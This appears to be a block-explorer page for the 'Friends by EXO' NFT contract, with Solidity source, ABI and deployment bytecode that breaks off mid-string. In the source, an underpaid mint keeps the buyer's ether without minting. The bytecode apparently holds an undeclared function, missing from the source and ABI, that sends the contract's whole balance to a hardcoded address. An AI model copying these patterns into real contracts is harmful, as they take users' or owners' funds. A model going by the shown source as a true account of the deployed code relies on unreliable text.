     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract FriendsbyEXO is ERC721A, TheOperatorFilterer {
    address public owner;

    uint256 public maxSupply = 999;

    uint256 public price = 0;

    uint256 public freeNum = 2;

    uint256 private maxPerTx;

    mapping(address => uint256) private _userForFree;

    mapping(uint256 => uint256) private _userMinted;

    function mint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        mintInternal(amount);
    }

    function mintInternal(uint256 amount) internal {
        if (msg.value == 0) {
            require(amount == 1 
            && _userMinted[block.number] < FreeNum() 
            && _userForFree[tx.origin] < freeNum );
            _userForFree[tx.origin]++;
            _userMinted[block.number]++;
            _safeMint(msg.sender, 1);
        } else {
            require(amount <= maxPerTx);
            if (msg.value >= amount * price)
            _safeMint(msg.sender, amount);
        }
    }

    function treasuryMint(address rec, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(rec, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("Friends by EXO", "FBEXO") {
        owner = msg.sender;
        maxPerTx = 20;
        price = 0.002 ether;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked("ipfs://bafybeigzbr3la6sn5havtfipv33foda44uo5joadv4ftdawiwwxgohrayq/", _toString(tokenId), ".json"));
    }

    function setFreePerAddr(uint256 maxTx, uint256 maxS) external onlyOwner {
        freeNum = maxTx;
        maxSupply = maxS;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    /////////////////////////////
    // OPENSEA FILTER REGISTRY 
    /////////////////////////////

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"freeNum","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"},{"internalType":"uint256","name":"maxS","type":"uint256"}],"name":"setFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"rec","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"treasuryMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526103e76009556000600a556002600b553480156200002157600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280600e81526020017f467269656e64732062792045584f0000000000000000000000000000000000008152506040518060400160405280600581526020017f464245584f0000000000000000000000000000000000000000000000000000008152508160029080519060200190620000bd92919062000348565b508060039080519060200190620000d692919062000348565b50620000e76200034360201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115620002e4578015620001aa576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b81526004016200017092919062000426565b600060405180830381600087803b1580156200018b57600080fd5b505af1158015620001a0573d6000803e3d6000fd5b50505050620002e3565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161462000264576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200022a92919062000426565b600060405180830381600087803b1580156200024557600080fd5b505af11580156200025a573d6000803e3d6000fd5b50505050620002e2565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002ad919062000409565b600060405180830381600087803b158015620002c857600080fd5b505af1158015620002dd573d6000803e3d6000fd5b505050505b5b5b505033600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506014600c8190555066071afd498d0000600a81905550620004ec565b600090565b828054620003569062000487565b90600052602060002090601f0160209004810192826200037a5760008555620003c6565b82601f106200039557805160ff1916838001178555620003c6565b82800160010185558215620003c6579182015b82811115620003c5578251825591602001919060010190620003a8565b5b509050620003d59190620003d9565b5090565b5b80821115620003f4576000816000905550600101620003da565b5090565b620004038162000453565b82525050565b6000602082019050620004206000830184620003f8565b92915050565b60006040820190506200043d6000830185620003f8565b6200044c6020830184620003f8565b9392505050565b6000620004608262000467565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006002820490506001821680620004a057607f821691505b60208210811415620004b757620004b6620004bd565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b612b8580620004fc6000396000f3fe60806040526004361061014b5760003560e01c806370a08231116100b6578063a22cb4651161006f578063a22cb4651461044a578063aa35cca314610473578063b88d4fde1461049c578063c87b56dd146104b8578063d5abeb01146104f5578063e985e9c5146105205761014b565b806370a08231146103455780637f942b5f146103825780638da5cb5b146103ad57806395d89b41146103d8578063a035b1fe14610403578063a0712d681461042e5761014b565b806338b08fd41161010857806338b08fd4146102585780633a233f89146102815780633ccfd60b146102aa57806341f43434146102c157806342842e0e146102ec5780636352211e146103085761014b565b806301ffc9a71461015057806306fdde031461018d578063081812fc146101b8578063095ea7b3146101f557806318160ddd1461021157806323b872dd1461023c575b600080fd5b34801561015c57600080fd5b5061017760048036038101906101729190612312565b61055d565b60405161018491906125bb565b60405180910390f35b34801561019957600080fd5b506101a26105ef565b6040516101af91906125f1565b60405180910390f35b3480156101c457600080fd5b506101df60048036038101906101da919061236c565b610681565b6040516101ec919061252b565b60405180910390f35b61020f600480360381019061020a91906122a5565b610700565b005b34801561021d57600080fd5b50610226610819565b6040516102339190612613565b60405180910390f35b6102566004803603810190610251919061218f565b610830565b005b34801561026457600080fd5b5061027f600480360381019061027a9190612399565b610990565b005b34801561028d57600080fd5b506102a860048036038101906102a3919061214f565b6109fc565b005b3480156102b657600080fd5b506102bf610a65565b005b3480156102cd57600080fd5b506102d6610b08565b6040516102e391906125d6565b60405180910390f35b6103066004803603810190610301919061218f565b610b1a565b005b34801561031457600080fd5b5061032f600480360381019061032a919061236c565b610c7a565b60405161033c919061252b565b60405180910390f35b34801561035157600080fd5b5061036c60048036038101906103679190612122565b610c8c565b6040516103799190612613565b60405180910390f35b34801561038e57600080fd5b50610397610d45565b6040516103a49190612613565b60405180910390f35b3480156103b957600080fd5b506103c2610d4b565b6040516103cf919061252b565b60405180910390f35b3480156103e457600080fd5b506103ed610d71565b6040516103fa91906125f1565b60405180910390f35b34801561040f57600080fd5b50610418610e03565b6040516104259190612613565b60405180910390f35b6104486004803603810190610443919061236c565b610e09565b005b34801561045657600080fd5b50610471600480360381019061046c9190612265565b610e36565b005b34801561047f57600080fd5b5061049a600480360381019061049591906122a5565b610f4f565b005b6104b660048036038101906104b191906121e2565b610fd8565b005b3480156104c457600080fd5b506104df60048036038101906104da919061236c565b61113b565b6040516104ec91906125f1565b60405180910390f35b34801561050157600080fd5b5061050a61116c565b6040516105179190612613565b60405180910390f35b34801561052c57600080fd5b506105476004803603810190610542919061214f565b611172565b60405161055491906125bb565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105b857506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806105e85750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546105fe906128c8565b80601f016020809104026020016040519081016040528092919081815260200182805461062a906128c8565b80156106775780601f1061064c57610100808354040283529160200191610677565b820191906000526020600020905b81548152906001019060200180831161065a57829003601f168201915b5050505050905090565b600061068c82611206565b6106c2576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561080a576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610778929190612546565b60206040518083038186803b15801561079057600080fd5b505afa1580156107a4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c891906122e5565b61080957806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610800919061252b565b60405180910390fd5b5b6108148383611265565b505050565b60006108236113a9565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561097e573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156108a35761089e8484846113ae565b61098a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016108ec929190612546565b60206040518083038186803b15801561090457600080fd5b505afa158015610918573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061093c91906122e5565b61097d57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610974919061252b565b60405180910390fd5b5b6109898484846113ae565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109ea57600080fd5b81600b81905550806009819055505050565b6000471115610a61577348764320dc3993ddf674a3c578acdeef4cd7278d73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610a5f573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610abf57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610b05573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c68573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b8d57610b888484846116d3565b610c74565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bd6929190612546565b60206040518083038186803b158015610bee57600080fd5b505afa158015610c02573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c2691906122e5565b610c6757336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c5e919061252b565b60405180910390fd5b5b610c738484846116d3565b5b50505050565b6000610c858261175d565b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cf4576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610d80906128c8565b80601f0160208091040260200160405190810160405280929190818152602001828054610dac906128c8565b8015610df95780601f10610dce57610100808354040283529160200191610df9565b820191906000526020600020905b815481529060010190602001808311610ddc57829003601f168201915b5050505050905090565b600a5481565b60095481610e15610819565b610e1f91906126c7565b1115610e2a57600080fd5b610e338161182b565b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f40576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610eae929190612546565b60206040518083038186803b158015610ec657600080fd5b505afa158015610eda573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610efe91906122e5565b610f3f57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f36919061252b565b60405180910390fd5b5b610f4a8383611972565b505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610fa957600080fd5b60095481610fb5610819565b610fbf91906126c7565b1115610fc